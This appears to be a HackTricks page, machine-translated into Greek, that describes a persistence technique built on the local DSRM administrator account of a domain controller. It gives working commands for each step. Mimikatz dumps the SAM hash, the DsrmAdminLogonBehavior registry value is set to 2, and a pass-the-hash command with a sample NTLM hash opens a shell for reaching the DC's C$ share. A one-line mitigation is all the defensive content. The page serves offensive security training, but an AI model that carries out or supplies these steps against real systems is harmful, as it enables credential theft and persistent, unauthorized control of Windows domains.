DSRM Credentials

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

DSRM Credentials

Υπάρχει ένας τοπικός διαχειριστής λογαριασμός μέσα σε κάθε DC. Έχοντας δικαιώματα διαχειριστή σε αυτή τη μηχανή, μπορείτε να χρησιμοποιήσετε το mimikatz για να dump the local Administrator hash. Στη συνέχεια, τροποποιώντας μια καταχώρηση μητρώου για να activate this password ώστε να μπορείτε να έχετε απομακρυσμένη πρόσβαση σε αυτόν τον τοπικό χρήστη διαχειριστή. Πρώτα πρέπει να dump το hash του τοπικού διαχειριστή χρήστη μέσα στο DC:

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

Τότε πρέπει να ελέγξουμε αν αυτός ο λογαριασμός θα λειτουργήσει, και αν το κλειδί μητρώου έχει την τιμή "0" ή δεν υπάρχει, πρέπει να το ορίσετε σε "2":

Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior #Check if the key exists and get the value
New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD #Create key with value "2" if it doesn't exist
Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2  #Change value to "2"

Τότε, χρησιμοποιώντας ένα PTH μπορείτε να καταγράψετε το περιεχόμενο του C$ ή ακόμα και να αποκτήσετε ένα shell. Σημειώστε ότι για τη δημιουργία μιας νέας συνεδρίας powershell με αυτό το hash στη μνήμη (για το PTH) το "domain" που χρησιμοποιείται είναι απλώς το όνομα της μηχανής DC:

sekurlsa::pth /domain:dc-host-name /user:Administrator /ntlm:b629ad5753f4c441e3af31c97fad8973 /run:powershell.exe
#And in new spawned powershell you now can access via NTLM the content of C$
ls \\dc-host-name\C$

Περισσότερες πληροφορίες σχετικά με αυτό: https://adsecurity.org/?p=1714 και https://adsecurity.org/?p=1785

Μετριασμός

  • Event ID 4657 - Έλεγχος δημιουργίας/αλλαγής του HKLM:\System\CurrentControlSet\Control\Lsa DsrmAdminLogonBehavior

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Υποστήριξη HackTricks

Last updated